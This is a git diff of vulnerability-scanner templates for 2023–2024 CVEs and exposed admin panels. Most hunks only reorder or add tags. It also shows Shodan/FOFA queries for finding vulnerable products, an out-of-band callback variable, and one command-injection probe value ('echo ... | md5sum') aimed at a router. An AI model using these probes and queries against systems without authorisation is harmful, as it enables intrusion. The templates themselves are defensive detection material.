a/http/cves/2023/CVE-2023-39676.yaml +++ b/http/cves/2023/CVE-2023-39676.yaml @@ -27,7 +27,7 @@ info: product: fieldpopupnewsletter framework: prestashop shodan-query: html:"fieldpopupnewsletter" - tags: cve,cve2023,prestashop,xss,fieldthemes + tags: cve2023,cve,prestashop,xss,fieldthemes http: - method: GET diff --git a/http/cves/2023/CVE-2023-39677.yaml b/http/cves/2023/CVE-2023-39677.yaml index eb45a8d275..1c43efee63 100644 --- a/http/cves/2023/CVE-2023-39677.yaml +++ b/http/cves/2023/CVE-2023-39677.yaml @@ -27,7 +27,7 @@ info: product: simpleimportproduct framework: prestashop shodan-query: http.component:"PrestaShop" - tags: cve,cve2023,prestashop,phpinfo,disclosure,simpleimportproduct_project + tags: cve2023,cve,prestashop,phpinfo,disclosure,simpleimportproduct_project http: - method: GET diff --git a/http/cves/2023/CVE-2023-40208.yaml b/http/cves/2023/CVE-2023-40208.yaml index 344223bf89..5578099882 100644 --- a/http/cves/2023/CVE-2023-40208.yaml +++ b/http/cves/2023/CVE-2023-40208.yaml @@ -27,7 +27,7 @@ info: vendor: urosevic product: stock_ticker framework: wordpress - tags: cve,cve2023,wordpress,wp-plugin,wpscan,wp,stock-ticker,xss,urosevic + tags: cve2023,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,xss,urosevic http: - raw: diff --git a/http/cves/2023/CVE-2023-40779.yaml b/http/cves/2023/CVE-2023-40779.yaml index fa14298382..762a7979b7 100644 --- a/http/cves/2023/CVE-2023-40779.yaml +++ b/http/cves/2023/CVE-2023-40779.yaml @@ -24,7 +24,7 @@ info: vendor: icewarp product: deep_castle_g2 shodan-query: title:"IceWarp" - tags: cve,cve2023,icewarp,redirect + tags: cve2023,cve,icewarp,redirect http: - method: GET diff --git a/http/cves/2023/CVE-2023-4110.yaml b/http/cves/2023/CVE-2023-4110.yaml index da7ee8b64a..9d7f25e703 100644 --- a/http/cves/2023/CVE-2023-4110.yaml +++ b/http/cves/2023/CVE-2023-4110.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: phpjabbers product: availability_booking_calendar - tags: packetstorm,cve,cve2023,xss,phpjabber,jabber,phpjabbers + tags: cve2023,cve,packetstorm,xss,phpjabber,jabber,phpjabbers http: - method: GET diff --git a/http/cves/2023/CVE-2023-41109.yaml b/http/cves/2023/CVE-2023-41109.yaml index c4a78d7374..d8771f3c0f 100644 --- a/http/cves/2023/CVE-2023-41109.yaml +++ b/http/cves/2023/CVE-2023-41109.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: patton product: smartnode_sn200_firmware - tags: cve,cve2023,smartnode,voip + tags: cve,cve2023,smartnode,voip,patton variables: payload: "echo CVE-2023-41109 | md5sum" diff --git a/http/cves/2023/CVE-2023-4111.yaml b/http/cves/2023/CVE-2023-4111.yaml index b98a09b765..ce2adf04d6 100644 --- a/http/cves/2023/CVE-2023-4111.yaml +++ b/http/cves/2023/CVE-2023-4111.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: phpjabbers product: bus_reservation_system - tags: packetstorm,cve,cve2023,xss,phpjabber,jabber,phpjabbers + tags: cve2023,cve,packetstorm,xss,phpjabber,jabber,phpjabbers http: - method: GET diff --git a/http/cves/2023/CVE-2023-4112.yaml b/http/cves/2023/CVE-2023-4112.yaml index 819cfd1454..4b24357994 100644 --- a/http/cves/2023/CVE-2023-4112.yaml +++ b/http/cves/2023/CVE-2023-4112.yaml @@ -26,7 +26,7 @@ info: vendor: phpjabbers product: shuttle_booking_software shodan-query: html:"PHP Jabbers.com" - tags: packetstorm,cve,cve2023,xss,unauth,phpjabbers + tags: cve2023,cve,packetstorm,xss,unauth,phpjabbers http: - method: GET diff --git a/http/cves/2023/CVE-2023-4113.yaml b/http/cves/2023/CVE-2023-4113.yaml index 669dff8d69..6c892d77b3 100644 --- a/http/cves/2023/CVE-2023-4113.yaml +++ b/http/cves/2023/CVE-2023-4113.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: phpjabbers product: service_booking_script - tags: packetstorm,cve,cve2023,xss,php,jabbers,phpjabbers + tags: cve2023,cve,packetstorm,xss,php,jabbers,phpjabbers http: - method: GET diff --git a/http/cves/2023/CVE-2023-4114.yaml b/http/cves/2023/CVE-2023-4114.yaml index 234d052198..d4ba09a184 100644 --- a/http/cves/2023/CVE-2023-4114.yaml +++ b/http/cves/2023/CVE-2023-4114.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: phpjabbers product: night_club_booking_software - tags: packetstorm,cve,cve2023,xss,php,jabbers,phpjabbers + tags: cve2023,cve,packetstorm,xss,php,jabbers,phpjabbers http: - method: GET diff --git a/http/cves/2023/CVE-2023-4115.yaml b/http/cves/2023/CVE-2023-4115.yaml index c3c1d9c703..97522c9ccc 100644 --- a/http/cves/2023/CVE-2023-4115.yaml +++ b/http/cves/2023/CVE-2023-4115.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: phpjabbers product: cleaning_business_software - tags: cve,cve2023,xss,phpjabber,jabber,phpjabbers + tags: cve2023,cve,xss,phpjabber,jabber,phpjabbers http: - method: GET diff --git a/http/cves/2023/CVE-2023-4116.yaml b/http/cves/2023/CVE-2023-4116.yaml index a549df5f70..722a0c5e84 100644 --- a/http/cves/2023/CVE-2023-4116.yaml +++ b/http/cves/2023/CVE-2023-4116.yaml @@ -26,7 +26,7 @@ info: vendor: phpjabbers product: taxi_booking_script shodan-query: html:"PHP Jabbers.com" - tags: packetstorm,cve,cve2023,xss,phpjabbers + tags: cve,cve2023,packetstorm,xss,phpjabbers http: - method: GET diff --git a/http/cves/2023/CVE-2023-41265.yaml b/http/cves/2023/CVE-2023-41265.yaml index aaf7cccd83..5ac9883486 100644 --- a/http/cves/2023/CVE-2023-41265.yaml +++ b/http/cves/2023/CVE-2023-41265.yaml @@ -25,7 +25,7 @@ info: product: qlik_sense framework: windows shodan-query: html:"Qlik" - tags: cve,cve2023,kev,qlik,smuggling + tags: cve2023,cve,kev,qlik,smuggling,windows http: - raw: diff --git a/http/cves/2023/CVE-2023-41266.yaml b/http/cves/2023/CVE-2023-41266.yaml index 2c15c15d61..ef18fbc98a 100644 --- a/http/cves/2023/CVE-2023-41266.yaml +++ b/http/cves/2023/CVE-2023-41266.yaml @@ -25,7 +25,7 @@ info: product: qlik_sense framework: windows shodan-query: http.favicon.hash:-74348711 - tags: cve,cve2023,qlik,traversal,kev + tags: cve2023,cve,qlik,traversal,kev,windows http: - method: GET diff --git a/http/cves/2023/CVE-2023-4148.yaml b/http/cves/2023/CVE-2023-4148.yaml index 6828aba81b..2295ebed74 100644 --- a/http/cves/2023/CVE-2023-4148.yaml +++ b/http/cves/2023/CVE-2023-4148.yaml @@ -25,7 +25,7 @@ info: product: ditty framework: wordpress publicwww-query: /wp-content/plugins/ditty-news-ticker/ - tags: cve,cve2023,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,authenticated,metaphorcreations + tags: cve2023,cve,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,authenticated,metaphorcreations http: - raw: diff --git a/http/cves/2023/CVE-2023-41538.yaml b/http/cves/2023/CVE-2023-41538.yaml index 975c4d3455..e7c961b280 100644 --- a/http/cves/2023/CVE-2023-41538.yaml +++ b/http/cves/2023/CVE-2023-41538.yaml @@ -22,7 +22,7 @@ info: max-request: 1 vendor: phpjabbers product: php_forum_script - tags: cve,cve2023,xss,phpjabber,jabber,phpjabbers + tags: cve2023,cve,xss,phpjabber,jabber,phpjabbers http: - method: GET diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index 5821ff93ee..a55f81db92 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -30,7 +30,7 @@ info: vendor: moosocial product: moostore fofa-query: mooSocial - tags: packetstorm,cve,cve2023,moosocial,xss + tags: cve2023,cve,packetstorm,moosocial,xss http: - method: GET diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index 5380d313e0..9393d815ef 100644 --- a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -30,7 +30,7 @@ info: vendor: moosocial product: moostore fofa-query: icon_hash="702863115" - tags: packetstorm,cve,cve2023,moosocial,xss + tags: cve,cve2023,packetstorm,moosocial,xss http: - method: GET diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml index 8d22b64e32..708be42dd0 100644 --- a/http/cves/2023/CVE-2023-41892.yaml +++ b/http/cves/2023/CVE-2023-41892.yaml @@ -28,7 +28,7 @@ info: product: craft_cms shodan-query: http.favicon.hash:-47932290 publicwww-query: "craftcms" - tags: cve,cve2023,rce,unauth,craftcms + tags: cve2023,cve,rce,unauth,craftcms http: - raw: diff --git a/http/cves/2023/CVE-2023-42343.yaml b/http/cves/2023/CVE-2023-42343.yaml index 0dcff613b6..c5d34f9f7a 100644 --- a/http/cves/2023/CVE-2023-42343.yaml +++ b/http/cves/2023/CVE-2023-42343.yaml @@ -15,7 +15,7 @@ info: max-request: 1 shodan-query: "/opencms/" verified: true - tags: cve,cve2023,xss,opencms + tags: cve2023,cve,xss,opencms http: - method: GET diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml index e1cb888558..ec3d4aa6b6 100644 --- a/http/cves/2023/CVE-2023-42442.yaml +++ b/http/cves/2023/CVE-2023-42442.yaml @@ -26,7 +26,7 @@ info: vendor: fit2cloud product: jumpserver fofa-query: title="JumpServer" - tags: cve,cve2023,jumpserver,exposure,fit2cloud + tags: cve2023,cve,jumpserver,exposure,fit2cloud http: - method: GET diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml index bd39bc9578..589bdd35c7 100644 --- a/http/cves/2023/CVE-2023-42793.yaml +++ b/http/cves/2023/CVE-2023-42793.yaml @@ -27,7 +27,7 @@ info: product: teamcity shodan-query: title:TeamCity fofa-query: title=TeamCity - tags: cve,cve2023,jetbrains,teamcity,rce,auth-bypass,intrusive,kev + tags: cve2023,cve,jetbrains,teamcity,rce,auth-bypass,intrusive,kev http: - raw: diff --git a/http/cves/2023/CVE-2023-43261.yaml b/http/cves/2023/CVE-2023-43261.yaml index 7c55e0f060..95443db1fb 100644 --- a/http/cves/2023/CVE-2023-43261.yaml +++ b/http/cves/2023/CVE-2023-43261.yaml @@ -26,7 +26,7 @@ info: vendor: milesight product: ur5x_firmware shodan-query: http.html:rt_title - tags: cve,cve2023,router,milesight,disclosure,unauth,iot + tags: cve2023,cve,router,milesight,disclosure,unauth,iot http: - method: GET diff --git a/http/cves/2023/CVE-2023-43325.yaml b/http/cves/2023/CVE-2023-43325.yaml index 2f1e6ee7ff..ce4a71788e 100644 --- a/http/cves/2023/CVE-2023-43325.yaml +++ b/http/cves/2023/CVE-2023-43325.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: moosocial product: moosocial - tags: cve,cve2023,xss,moosocial + tags: cve2023,cve,xss,moosocial http: - method: GET diff --git a/http/cves/2023/CVE-2023-43326.yaml b/http/cves/2023/CVE-2023-43326.yaml index 9ad23be6fa..da14fb4de4 100644 --- a/http/cves/2023/CVE-2023-43326.yaml +++ b/http/cves/2023/CVE-2023-43326.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: moosocial product: moosocial - tags: cve,cve2023,xss,moosocial + tags: cve2023,cve,xss,moosocial http: - method: GET diff --git a/http/cves/2023/CVE-2023-43795.yaml b/http/cves/2023/CVE-2023-43795.yaml index 32d440daca..e87343b464 100644 --- a/http/cves/2023/CVE-2023-43795.yaml +++ b/http/cves/2023/CVE-2023-43795.yaml @@ -25,7 +25,7 @@ info: product: geoserver shodan-query: title:"GeoServer" fofa-query: app="GeoServer" - tags: cve,cve2023,geoserver,ssrf,oast,oos,osgeo + tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo variables: oast: "{{interactsh-url}}" string: "{{to_lower(rand_text_alpha(4))}}" diff --git a/http/cves/2023/CVE-2023-4415.yaml b/http/cves/2023/CVE-2023-4415.yaml index 5d2997f076..39c4276527 100644 --- a/http/cves/2023/CVE-2023-4415.yaml +++ b/http/cves/2023/CVE-2023-4415.yaml @@ -24,7 +24,7 @@ info: vendor: ruijienetworks product: rg-ew1200g_firmware fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" - tags: cve,cve2023,ruijie,router,ruijienetworks + tags: cve2023,cve,ruijie,router,ruijienetworks http: - method: POST diff --git a/http/cves/2023/CVE-2023-44353.yaml b/http/cves/2023/CVE-2023-44353.yaml index 0d533a93dd..316e44c070 100644 --- a/http/cves/2023/CVE-2023-44353.yaml +++ b/http/cves/2023/CVE-2023-44353.yaml @@ -26,7 +26,7 @@ info: vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" - tags: cve,cve2023,adobe,coldfusion,deserialization + tags: cve2023,cve,adobe,coldfusion,deserialization,xss variables: windows_known_path: "C:\\Windows\\" diff --git a/http/cves/2023/CVE-2023-4451.yaml b/http/cves/2023/CVE-2023-4451.yaml index 754c98f878..68fa3647ee 100644 --- a/http/cves/2023/CVE-2023-4451.yaml +++ b/http/cves/2023/CVE-2023-4451.yaml @@ -25,7 +25,7 @@ info: vendor: agentejo product: cockpit shodan-query: html:"Cockpit" - tags: huntr,cve,cve2023,cockpit,xss,agentejo + tags: cve2023,cve,huntr,cockpit,xss,agentejo http: - method: GET diff --git a/http/cves/2023/CVE-2023-45542.yaml b/http/cves/2023/CVE-2023-45542.yaml index 6d1f6123bf..61b31289f4 100644 --- a/http/cves/2023/CVE-2023-45542.yaml +++ b/http/cves/2023/CVE-2023-45542.yaml @@ -22,7 +22,7 @@ info: max-request: 1 vendor: moosocial product: moosocial - tags: cve,cve2023,xss,moosocial + tags: cve2023,cve,xss,moosocial http: - method: GET diff --git a/http/cves/2023/CVE-2023-4568.yaml b/http/cves/2023/CVE-2023-4568.yaml index 729b45025f..b079060272 100644 --- a/http/cves/2023/CVE-2023-4568.yaml +++ b/http/cves/2023/CVE-2023-4568.yaml @@ -25,7 +25,7 @@ info: vendor: papercut product: papercut_ng shodan-query: html:"content="PaperCut"" - tags: cve,cve2023,unauth,papercut + tags: cve2023,cve,unauth,papercut http: - raw: diff --git a/http/cves/2023/CVE-2023-45852.yaml b/http/cves/2023/CVE-2023-45852.yaml index 2d45db608c..7d20387cda 100644 --- a/http/cves/2023/CVE-2023-45852.yaml +++ b/http/cves/2023/CVE-2023-45852.yaml @@ -25,7 +25,7 @@ info: product: vitogate_300_firmware shodan-query: title:"Vitogate 300" fofa-query: title="Vitogate 300" - tags: cve,cve2023,rce,vitogate,viessmann + tags: cve2023,cve,rce,vitogate,viessmann http: - raw: diff --git a/http/cves/2023/CVE-2023-4596.yaml b/http/cves/2023/CVE-2023-4596.yaml index 0d9ee94cfb..0183e7373b 100644 --- a/http/cves/2023/CVE-2023-4596.yaml +++ b/http/cves/2023/CVE-2023-4596.yaml @@ -27,7 +27,7 @@ info: product: forminator framework: wordpress publicwww-query: /wp-content/plugins/Forminator - tags: cve,cve2023,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub + tags: cve2023,cve,forminator,wordpress,wp,wp-plugin,fileupload,intrusive,rce,incsub http: - raw: diff --git a/http/cves/2023/CVE-2023-4634.yaml b/http/cves/2023/CVE-2023-4634.yaml index 622c46cca9..9da647f748 100644 --- a/http/cves/2023/CVE-2023-4634.yaml +++ b/http/cves/2023/CVE-2023-4634.yaml @@ -30,7 +30,7 @@ info: product: media_library_assistant framework: wordpress publicwww-query: "wp-content/plugins/media-library-assistant" - tags: packetstorm,cve,cve2023,wordpress,wp,wp-plugin,lfi,rce,media-library-assistant,davidlingren + tags: cve,cve2023,packetstorm,wordpress,wp,wp-plugin,lfi,rce,media-library-assistant,davidlingren http: - method: GET diff --git a/http/cves/2023/CVE-2023-46359.yaml b/http/cves/2023/CVE-2023-46359.yaml index f563835b5d..f9d2e4f68f 100644 --- a/http/cves/2023/CVE-2023-46359.yaml +++ b/http/cves/2023/CVE-2023-46359.yaml @@ -18,7 +18,7 @@ info: verified: true max-request: 1 shodan-query: html:"Salia PLCC" - tags: cve,cve2023,salia-plcc,cph2,rce + tags: cve2023,cve,salia-plcc,cph2,rce http: - method: GET diff --git a/http/cves/2023/CVE-2023-46574.yaml b/http/cves/2023/CVE-2023-46574.yaml index 3d4083cdea..29a79e76b6 100644 --- a/http/cves/2023/CVE-2023-46574.yaml +++ b/http/cves/2023/CVE-2023-46574.yaml @@ -23,9 +23,7 @@ info: shodan-query: title:"Totolink" vendor: totolink product: a3700r_firmware - tags: cve,cve2023,totolink,router,iot,rce - -flow: http(1) && http(2) + tags: cve2023,cve,totolink,router,iot,rce http: - method: GET diff --git a/http/cves/2023/CVE-2023-46747.yaml b/http/cves/2023/CVE-2023-46747.yaml index 418e182a11..ceb61788ea 100644 --- a/http/cves/2023/CVE-2023-46747.yaml +++ b/http/cves/2023/CVE-2023-46747.yaml @@ -25,7 +25,7 @@ info: vendor: f5 product: big-ip_access_policy_manager shodan-query: http.title:"BIG-IP®-+Redirect" +"Server" - tags: packetstorm,cve,cve2023,rce,f5,bigip,unauth,ajp,smuggling,intrusive,kev + tags: cve2023,cve,packetstorm,rce,f5,bigip,unauth,ajp,smuggling,intrusive,kev variables: username: "{{hex_encode(rand_base(5))}}" password: "{{hex_encode(rand_base(12))}}" diff --git a/http/cves/2023/CVE-2023-4714.yaml b/http/cves/2023/CVE-2023-4714.yaml index 587bdcd371..1beedb7727 100644 --- a/http/cves/2023/CVE-2023-4714.yaml +++ b/http/cves/2023/CVE-2023-4714.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: playtube product: playtube - tags: cve,cve2023,playtube,exposure + tags: cve2023,cve,playtube,exposure http: - method: GET diff --git a/http/cves/2023/CVE-2023-49070.yaml b/http/cves/2023/CVE-2023-49070.yaml index cecd466fbe..85f773308e 100644 --- a/http/cves/2023/CVE-2023-49070.yaml +++ b/http/cves/2023/CVE-2023-49070.yaml @@ -27,7 +27,7 @@ info: product: ofbiz shodan-query: html:"OFBiz" fofa-query: app="Apache_OFBiz" - tags: seclists,cve,cve2023,apache,ofbiz,deserialization,rce + tags: cve,cve2023,seclists,apache,ofbiz,deserialization,rce http: - raw: diff --git a/http/cves/2023/CVE-2023-49103.yaml b/http/cves/2023/CVE-2023-49103.yaml index b9d3af2979..741b7f6da7 100644 --- a/http/cves/2023/CVE-2023-49103.yaml +++ b/http/cves/2023/CVE-2023-49103.yaml @@ -27,7 +27,7 @@ info: vendor: owncloud product: graph_api shodan-query: title:"owncloud" - tags: cve,cve2023,owncloud,phpinfo,config,kev + tags: cve2023,cve,owncloud,phpinfo,config,kev http: - method: GET diff --git a/http/cves/2023/CVE-2023-4974.yaml b/http/cves/2023/CVE-2023-4974.yaml index da0e551126..3862bd5f26 100644 --- a/http/cves/2023/CVE-2023-4974.yaml +++ b/http/cves/2023/CVE-2023-4974.yaml @@ -26,7 +26,7 @@ info: vendor: creativeitem product: academy_lms shodan-query: html:"Academy LMS" - tags: packetstorm,cve,cve2023,sqli,academy,lms,creativeitem + tags: cve,cve2023,packetstorm,sqli,academy,lms,creativeitem http: - raw: diff --git a/http/cves/2023/CVE-2023-5074.yaml b/http/cves/2023/CVE-2023-5074.yaml index 058e084788..943874eae8 100644 --- a/http/cves/2023/CVE-2023-5074.yaml +++ b/http/cves/2023/CVE-2023-5074.yaml @@ -26,7 +26,7 @@ info: product: d-view_8 shodan-query: http.favicon.hash:-1317621215 fofa-query: icon_hash="-1317621215" - tags: cve,cve2023,d-link,auth-bypass,dlink + tags: cve2023,cve,d-link,auth-bypass,dlink http: - raw: diff --git a/http/cves/2023/CVE-2023-50917.yaml b/http/cves/2023/CVE-2023-50917.yaml index a8fbd88b73..0d911d178e 100644 --- a/http/cves/2023/CVE-2023-50917.yaml +++ b/http/cves/2023/CVE-2023-50917.yaml @@ -27,7 +27,7 @@ info: product: majordomo shodan-query: http.favicon.hash:1903390397 fofa-query: app="MajordomoSL" - tags: cve,cve2023,majordomo,rce,os + tags: cve,cve2023,majordomo,rce,os,mjdm http: - method: GET diff --git a/http/cves/2023/CVE-2023-50968.yaml b/http/cves/2023/CVE-2023-50968.yaml index d66ef850ab..839ab64358 100644 --- a/http/cves/2023/CVE-2023-50968.yaml +++ b/http/cves/2023/CVE-2023-50968.yaml @@ -22,7 +22,7 @@ info: fofa-query: app="Apache_OFBiz" vendor: apache product: ofbiz - tags: cve,cve2023,apache,ofbiz,ssrf + tags: cve2023,cve,apache,ofbiz,ssrf variables: str: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-51467.yaml b/http/cves/2023/CVE-2023-51467.yaml index a25b599774..9174d43a9d 100644 --- a/http/cves/2023/CVE-2023-51467.yaml +++ b/http/cves/2023/CVE-2023-51467.yaml @@ -21,7 +21,7 @@ info: product: ofbiz shodan-query: html:"OFBiz" fofa-query: app="Apache_OFBiz" - tags: cve,cve2023,apache,ofbiz,rce + tags: cve2023,cve,apache,ofbiz,rce http: - raw: diff --git a/http/cves/2023/CVE-2023-5244.yaml b/http/cves/2023/CVE-2023-5244.yaml index cc71849ee4..fa74cbf058 100644 --- a/http/cves/2023/CVE-2023-5244.yaml +++ b/http/cves/2023/CVE-2023-5244.yaml @@ -26,7 +26,7 @@ info: vendor: microweber product: microweber shodan-query: http.favicon.hash:780351152 - tags: huntr,cve,cve2023,xss,microweber + tags: cve,cve2023,huntr,xss,microweber http: - method: GET diff --git a/http/cves/2023/CVE-2023-5360.yaml b/http/cves/2023/CVE-2023-5360.yaml index e3c14fb6d0..4dca092f6d 100644 --- a/http/cves/2023/CVE-2023-5360.yaml +++ b/http/cves/2023/CVE-2023-5360.yaml @@ -28,7 +28,7 @@ info: product: royal_elementor_addons framework: wordpress publicwww-query: "/plugins/royal-elementor-addons/" - tags: cve,cve2023,rce,wpscan,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive + tags: cve2023,cve,rce,wpscan,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive variables: file: "{{to_lower(rand_text_alpha(5))}}" diff --git a/http/cves/2023/CVE-2023-5375.yaml b/http/cves/2023/CVE-2023-5375.yaml index 719c94c6ec..5731b8dfb7 100644 --- a/http/cves/2023/CVE-2023-5375.yaml +++ b/http/cves/2023/CVE-2023-5375.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: mosparo product: mosparo - tags: huntr,cve,cve2023,mosparo,redirect + tags: cve2023,cve,huntr,mosparo,redirect http: - method: GET diff --git a/http/cves/2023/CVE-2023-5556.yaml b/http/cves/2023/CVE-2023-5556.yaml index b414fa1b9a..a76df34d51 100644 --- a/http/cves/2023/CVE-2023-5556.yaml +++ b/http/cves/2023/CVE-2023-5556.yaml @@ -24,7 +24,7 @@ info: vendor: structurizr product: on-premises_installation shodan-query: http.favicon.hash:1199592666 - tags: cve,cve2023,xss,structurizr,oos,authenticated + tags: cve2023,cve,xss,structurizr,oos,authenticated variables: str: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-6018.yaml b/http/cves/2023/CVE-2023-6018.yaml index 17dcc1b89d..ef68b27534 100644 --- a/http/cves/2023/CVE-2023-6018.yaml +++ b/http/cves/2023/CVE-2023-6018.yaml @@ -23,7 +23,7 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" - tags: cve,cve2023,mlflow,oss,rce,intrusive + tags: cve,cve2023,mlflow,oss,rce,intrusive,lfprojects variables: model_name: "{{rand_text_alpha(6)}}" diff --git a/http/cves/2023/CVE-2023-6020.yaml b/http/cves/2023/CVE-2023-6020.yaml index f0366e485a..83ef8bae73 100644 --- a/http/cves/2023/CVE-2023-6020.yaml +++ b/http/cves/2023/CVE-2023-6020.yaml @@ -23,7 +23,7 @@ info: vendor: ray_project product: ray shodan-query: http.favicon.hash:463802404 - tags: cve,cve2023,lfi,ray,oos + tags: cve2023,cve,lfi,ray,oos,ray_project http: - method: GET diff --git a/http/cves/2023/CVE-2023-6021.yaml b/http/cves/2023/CVE-2023-6021.yaml index 18d860d7c5..16dd29a6a5 100644 --- a/http/cves/2023/CVE-2023-6021.yaml +++ b/http/cves/2023/CVE-2023-6021.yaml @@ -23,7 +23,7 @@ info: vendor: ray_project product: ray shodan-query: html:"Ray Dashboard" - tags: cve,cve2023,lfi,ray,oos + tags: cve,cve2023,lfi,ray,oos,ray_project http: - method: GET diff --git a/http/cves/2023/CVE-2023-6038.yaml b/http/cves/2023/CVE-2023-6038.yaml index 23f76e6835..0492970f4d 100644 --- a/http/cves/2023/CVE-2023-6038.yaml +++ b/http/cves/2023/CVE-2023-6038.yaml @@ -24,7 +24,7 @@ info: max-request: 1 product: h2o vendor: h2o - tags: cve,cve2023,h2o-3,h2o,ml + tags: cve2023,cve,h2o-3,h2o,ml http: - raw: diff --git a/http/cves/2023/CVE-2023-6379.yaml b/http/cves/2023/CVE-2023-6379.yaml index b6cc8a9d47..e7610527da 100644 --- a/http/cves/2023/CVE-2023-6379.yaml +++ b/http/cves/2023/CVE-2023-6379.yaml @@ -24,7 +24,7 @@ info: vendor: alkacon product: OpenCms shodan-query: title:"opencms" - tags: cve,cve2023,opencms,xss,alkacon + tags: cve2023,cve,opencms,xss,alkacon http: - method: GET diff --git a/http/cves/2023/CVE-2023-6380.yaml b/http/cves/2023/CVE-2023-6380.yaml index 07c6bb8900..e8670f78ce 100644 --- a/http/cves/2023/CVE-2023-6380.yaml +++ b/http/cves/2023/CVE-2023-6380.yaml @@ -16,7 +16,7 @@ info: max-request: 1 shodan-query: "/opencms/" verified: true - tags: cve,cve2023,redirect,opencms + tags: cve2023,cve,redirect,opencms http: - method: GET diff --git a/http/cves/2023/CVE-2023-6623.yaml b/http/cves/2023/CVE-2023-6623.yaml index 8865a6a16f..04f2bfc9de 100644 --- a/http/cves/2023/CVE-2023-6623.yaml +++ b/http/cves/2023/CVE-2023-6623.yaml @@ -22,7 +22,7 @@ info: max-request: 2 verified: true publicwww-query: "/wp-content/plugins/essential-blocks/" - tags: cve,cve2023,wp,wp-plugin,wordpress,essential-blocks,lfi + tags: cve2023,cve,wp,wp-plugin,wordpress,essential-blocks,lfi http: - method: GET diff --git a/http/cves/2024/CVE-2024-0352.yaml b/http/cves/2024/CVE-2024-0352.yaml index 84178d4fb9..2d753a700d 100644 --- a/http/cves/2024/CVE-2024-0352.yaml +++ b/http/cves/2024/CVE-2024-0352.yaml @@ -21,7 +21,7 @@ info: max-request: 1 shodan-query: http.favicon.hash:874152924 vendor: likeshop - tags: cve,cve2024,rce,file-upload,likeshop,instrusive + tags: cve2024,cve,rce,file-upload,likeshop,instrusive variables: filename: "{{rand_base(6)}}" diff --git a/http/exposed-panels/adhoc-transfer-panel.yaml b/http/exposed-panels/adhoc-transfer-panel.yaml index da7d8e7173..d1b89ff968 100644 --- a/http/exposed-panels/adhoc-transfer-panel.yaml +++ b/http/exposed-panels/adhoc-transfer-panel.yaml @@ -11,7 +11,7 @@ info: vendor: progress product: ws_ftp shodan-query: http.title:"Ad Hoc Transfer" - tags: panel,wsftp,ad-hoc,detect,login + tags: panel,wsftp,ad-hoc,detect,login,progress http: - method: GET diff --git a/http/exposed-panels/adminer-panel-detect.yaml b/http/exposed-panels/adminer-panel-detect.yaml index b9129e2d51..b868705b08 100644 --- a/http/exposed-panels/adminer-panel-detect.yaml +++ b/http/exposed-panels/adminer-panel-detect.yaml @@ -17,7 +17,7 @@ info: # Is generally handy if you find SQL creds metadata: max-request: 741 - tags: fuzz,adminer,login + tags: panel,fuzz,adminer,login,sqli http: - raw: diff --git a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml index 68bbed4370..207e9525ec 100644 --- a/http/exposed-panels/dzzoffice/dzzoffice-install.yaml +++ b/http/exposed-panels/dzzoffice/dzzoffice-install.yaml @@ -14,7 +14,7 @@ info: max-request: 1 shodan-query: http.favicon.hash:-1961736892 fofa-query: title="dzzoffice" - tags: dzzoffice,install + tags: panel,dzzoffice,install http: - method: GET diff --git a/http/exposed-panels/gryphon-login.yaml b/http/exposed-panels/gryphon-login.yaml index 7a31da8cac..c59e4d6cb5 100644 --- a/http/exposed-panels/gryphon-login.yaml +++ b/http/exposed-panels/gryphon-login.yaml @@ -12,7 +12,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Gryphon" - tags: gryphon,router + tags: panel,gryphon,router http: - method: GET diff --git a/http/exposed-panels/laravel-filemanager.yaml b/http/exposed-panels/laravel-filemanager.yaml index 4593a4740e..65311d44e0 100644 --- a/http/exposed-panels/laravel-filemanager.yaml +++ b/http/exposed-panels/laravel-filemanager.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: laravel,filemanager,fileupload,intrusive + tags: panel,laravel,filemanager,fileupload,intrusive http: - method: GET diff --git a/http/exposed-panels/luci-login-detection.yaml b/http/exposed-panels/luci-login-detection.yaml index 67e0f29a48..66f10e3c75 100644 --- a/http/exposed-panels/luci-login-detection.yaml +++ b/http/exposed-panels/luci-login-detection.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: login + tags: panel,login http: - method: GET diff --git a/http/exposed-panels/openbmcs-detect.yaml b/http/exposed-panels/openbmcs-detect.yaml index df36231c80..4d2d0d180c 100644 --- a/http/exposed-panels/openbmcs-detect.yaml +++ b/http/exposed-panels/openbmcs-detect.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: 